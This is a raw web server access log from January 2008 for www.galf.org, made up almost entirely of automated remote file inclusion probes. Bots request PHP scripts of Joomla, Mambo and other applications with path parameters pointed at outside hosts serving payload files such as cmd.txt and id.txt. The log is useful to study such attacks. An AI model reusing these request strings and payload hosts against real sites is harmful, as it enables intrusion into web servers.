70.84.193.50 - - [14/Jan/2008:11:00:01 -0800] "GET /logs//admin.php?include_path=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
70.84.193.50 - - [14/Jan/2008:11:00:01 -0800] "GET //admin.php?include_path=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
213.134.134.229 - - [14/Jan/2008:11:00:54 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.appleman.com.tw/pub/image/site/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.52.170.162 - - [14/Jan/2008:11:01:15 -0800] "GET /logs/access_070917.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.170.162 - - [14/Jan/2008:11:01:16 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
190.2.45.165 - - [14/Jan/2008:11:01:35 -0800] "GET /logs/access_070903.log/impex/ImpExData.php?systempath=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
190.2.45.165 - - [14/Jan/2008:11:01:36 -0800] "GET /impex/ImpExData.php?systempath=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
190.2.45.165 - - [14/Jan/2008:11:01:36 -0800] "GET /logs/impex/ImpExData.php?systempath=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.241.213.160 - - [14/Jan/2008:11:01:58 -0800] "GET /logs//admin/header.php?loc=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.160 - - [14/Jan/2008:11:01:58 -0800] "GET //admin/header.php?loc=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.71.89.170 - - [14/Jan/2008:11:03:53 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://friend4evernet.altervista.org/main.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.71.89.170 - - [14/Jan/2008:11:03:54 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://friend4evernet.altervista.org/main.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.71.89.170 - - [14/Jan/2008:11:03:54 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://friend4evernet.altervista.org/main.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.71.89.170 - - [14/Jan/2008:11:03:54 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://friend4evernet.altervista.org/main.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.64.72.108 - - [14/Jan/2008:11:04:17 -0800] "GET /logs/access_071231.log/com_simpleboard/file_upload.php?sbp=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.72.108 - - [14/Jan/2008:11:04:27 -0800] "GET /logs/com_simpleboard/file_upload.php?sbp=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.246.61.117 - - [14/Jan/2008:11:05:10 -0800] "GET /logs/access_071028.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://lucrago.free.fr/isa/js/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.246.61.117 - - [14/Jan/2008:11:05:10 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://lucrago.free.fr/isa/js/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.71.89.170 - - [14/Jan/2008:11:05:19 -0800] "GET /logs/access_071210.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://friend4evernet.altervista.org/main.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.71.89.170 - - [14/Jan/2008:11:05:19 -0800] "GET /logs/access_071210.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://friend4evernet.altervista.org/main.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
125.245.27.141 - - [14/Jan/2008:11:05:37 -0800] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
217.65.100.5 - - [14/Jan/2008:11:05:53 -0800] "GET //admin.php?include_path=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
217.65.100.5 - - [14/Jan/2008:11:05:54 -0800] "GET /logs//admin.php?include_path=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
203.130.246.56 - - [14/Jan/2008:11:06:05 -0800] "GET /logs/access_071217.log//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.50.14.189 - - [14/Jan/2008:11:06:39 -0800] "GET /logs/access_071231.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.urworte.de/wp-content/plugins/mygallery/myfunctions/ALB.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.50.14.189 - - [14/Jan/2008:11:06:39 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.urworte.de/wp-content/plugins/mygallery/myfunctions/ALB.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.50.14.189 - - [14/Jan/2008:11:06:39 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.urworte.de/wp-content/plugins/mygallery/myfunctions/ALB.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:11:08:01 -0800] "GET /logs/access_070723.log/middle.php?file=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:11:08:01 -0800] "GET /middle.php?file=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:11:08:03 -0800] "GET /logs/middle.php?file=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.25.68.146 - - [14/Jan/2008:11:08:13 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
81.25.68.146 - - [14/Jan/2008:11:08:13 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
81.25.68.146 - - [14/Jan/2008:11:08:13 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
81.25.68.146 - - [14/Jan/2008:11:08:14 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
81.25.68.146 - - [14/Jan/2008:11:08:14 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
200.87.230.170 - - [14/Jan/2008:11:08:41 -0800] "GET /logs/access_071105.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://barza.us/images/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.87.230.170 - - [14/Jan/2008:11:08:52 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://barza.us/images/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.87.230.170 - - [14/Jan/2008:11:09:05 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://barza.us/images/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.111.176.90 - - [14/Jan/2008:11:09:17 -0800] "GET /logs/access_070917.log//login.php?dir=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [14/Jan/2008:11:09:18 -0800] "GET /logs//login.php?dir=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.254.58.42 - - [14/Jan/2008:11:09:50 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:11:10:02 -0800] "GET /logs/access_071217.log/nav.php?page=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:11:10:04 -0800] "GET /nav.php?page=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:11:10:08 -0800] "GET /logs/nav.php?page=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.130.246.56 - - [14/Jan/2008:11:10:12 -0800] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [14/Jan/2008:11:11:03 -0800] "GET /logs/access_071001.log/com_simpleboard/file_upload.php?sbp=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.133.111.29 - - [14/Jan/2008:11:12:31 -0800] "GET /logs/index2.php?x=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.133.111.29 - - [14/Jan/2008:11:12:32 -0800] "GET /index2.php?x=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.50.14.189 - - [14/Jan/2008:11:12:51 -0800] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.urworte.de/wp-content/plugins/mygallery/myfunctions/ALB.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.170.162 - - [14/Jan/2008:11:13:28 -0800] "GET //include/main.php?config[search_disp]=true&include_dir=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.25.68.146 - - [14/Jan/2008:11:13:37 -0800] "GET /logs/access_071217.log//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
81.25.68.146 - - [14/Jan/2008:11:13:46 -0800] "GET /logs/access_071217.log//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
69.61.99.130 - - [14/Jan/2008:11:14:22 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kluna.info/mokon.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.61.99.130 - - [14/Jan/2008:11:14:22 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kluna.info/mokon.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.93.58.70 - - [14/Jan/2008:11:15:26 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.58.70 - - [14/Jan/2008:11:15:26 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.58.70 - - [14/Jan/2008:11:15:27 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.190.39.103 - - [14/Jan/2008:11:15:29 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.190.39.103 - - [14/Jan/2008:11:15:30 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.190.39.103 - - [14/Jan/2008:11:15:30 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.93.58.70 - - [14/Jan/2008:11:15:30 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.190.39.103 - - [14/Jan/2008:11:15:33 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.93.58.70 - - [14/Jan/2008:11:15:34 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.58.70 - - [14/Jan/2008:11:15:34 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.130.246.56 - - [14/Jan/2008:11:16:50 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.130.246.56 - - [14/Jan/2008:11:16:53 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
122.153.16.5 - - [14/Jan/2008:11:16:54 -0800] "GET /logs/access_071015.log/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.153.16.5 - - [14/Jan/2008:11:16:54 -0800] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
66.7.209.233 - - [14/Jan/2008:11:17:05 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.209.233 - - [14/Jan/2008:11:17:05 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.209.233 - - [14/Jan/2008:11:17:06 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.62.12.248 - - [14/Jan/2008:11:17:31 -0800] "GET /logs/access_071028.log//step_one.php?server_inc=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.62.12.248 - - [14/Jan/2008:11:17:31 -0800] "GET //step_one.php?server_inc=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.62.12.248 - - [14/Jan/2008:11:17:32 -0800] "GET /logs//step_one.php?server_inc=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.62.12.248 - - [14/Jan/2008:11:17:58 -0800] "GET /logs/access_071210.log//step_one.php?server_inc=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.61.99.130 - - [14/Jan/2008:11:18:56 -0800] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kluna.info/mokon.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
86.109.165.93 - - [14/Jan/2008:11:19:52 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
86.109.165.93 - - [14/Jan/2008:11:19:52 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
86.109.165.93 - - [14/Jan/2008:11:19:52 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.53.227.2 - - [14/Jan/2008:11:21:24 -0800] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:11:21:56 -0800] "GET /logs/access_070903.log/activate.php?userName=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:11:21:59 -0800] "GET /activate.php?userName=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:11:22:01 -0800] "GET /logs/activate.php?userName=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:11:22:06 -0800] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.58.70 - - [14/Jan/2008:11:22:28 -0800] "GET /logs/access_071217.log//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.58.70 - - [14/Jan/2008:11:22:35 -0800] "GET /logs/access_071217.log//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.133.111.29 - - [14/Jan/2008:11:23:10 -0800] "GET /logs/access_071008.log/index2.php?x=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:11:23:56 -0800] "GET /logs/access_070820.log/index2.php?x=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:11:23:56 -0800] "GET /index2.php?x=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:11:23:56 -0800] "GET /logs/index2.php?x=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:11:23:57 -0800] "GET /logs/access_071217.log/middle.php?file=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:11:23:57 -0800] "GET /logs/access_071008.log/index2.php?x=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
74.52.170.162 - - [14/Jan/2008:11:24:29 -0800] "GET /logs/access_070806.log//include/main.php?config[search_disp]=true&include_dir=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.170.162 - - [14/Jan/2008:11:24:30 -0800] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.8.75 - - [14/Jan/2008:11:24:56 -0800] "GET /logs/access_070716.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.133.111.29 - - [14/Jan/2008:11:24:58 -0800] "GET /logs/access_071119.log/index2.php?x=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.150.200.101 - - [14/Jan/2008:11:25:47 -0800] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://vangeenen.demon.nl/images/jaarwisseling2004/pages/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
217.150.200.101 - - [14/Jan/2008:11:26:18 -0800] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://vangeenen.demon.nl/images/jaarwisseling2004/pages/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
69.64.72.108 - - [14/Jan/2008:11:26:35 -0800] "GET /logs/access_071001.log/com_simpleboard/file_upload.php?sbp=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.52.170.162 - - [14/Jan/2008:11:26:57 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.170.162 - - [14/Jan/2008:11:26:57 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:11:27:17 -0800] "GET /logs/access_070820.log/index2.php?x=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:11:27:18 -0800] "GET /index2.php?x=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:11:27:18 -0800] "GET /logs/index2.php?x=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.153.16.5 - - [14/Jan/2008:11:27:21 -0800] "GET /logs/access_071015.log/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.153.16.5 - - [14/Jan/2008:11:27:21 -0800] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
122.153.16.5 - - [14/Jan/2008:11:27:32 -0800] "GET /logs/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 5473 "-" "libwww-perl/5.79" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:11:27:48 -0800] "GET /logs/access_070730.log/index2.php?x=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.153.16.5 - - [14/Jan/2008:11:28:56 -0800] "GET /logs/access_071015.log/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.153.16.5 - - [14/Jan/2008:11:28:56 -0800] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
122.153.16.5 - - [14/Jan/2008:11:28:57 -0800] "GET /logs/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 5473 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.95 - - [14/Jan/2008:11:31:47 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
62.193.248.95 - - [14/Jan/2008:11:31:48 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.galf.org"
207.210.91.2 - - [14/Jan/2008:11:31:54 -0800] "GET /index.php?open=http://miepicardenas.org/administrator/components/com_mp3player/mp3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
122.153.16.5 - - [14/Jan/2008:11:33:12 -0800] "GET /logs/access_071015.log/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.153.16.5 - - [14/Jan/2008:11:33:18 -0800] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
122.153.16.5 - - [14/Jan/2008:11:33:23 -0800] "GET /logs/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 5473 "-" "libwww-perl/5.79" "www.galf.org"
202.53.227.2 - - [14/Jan/2008:11:33:33 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
202.53.227.2 - - [14/Jan/2008:11:33:47 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
218.50.53.151 - - [14/Jan/2008:11:34:47 -0800] "GET /logs/access_070917.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.50.53.151 - - [14/Jan/2008:11:34:52 -0800] "GET /logs/access_070917.log//extcalendar.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.22.145 - - [14/Jan/2008:11:36:13 -0800] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
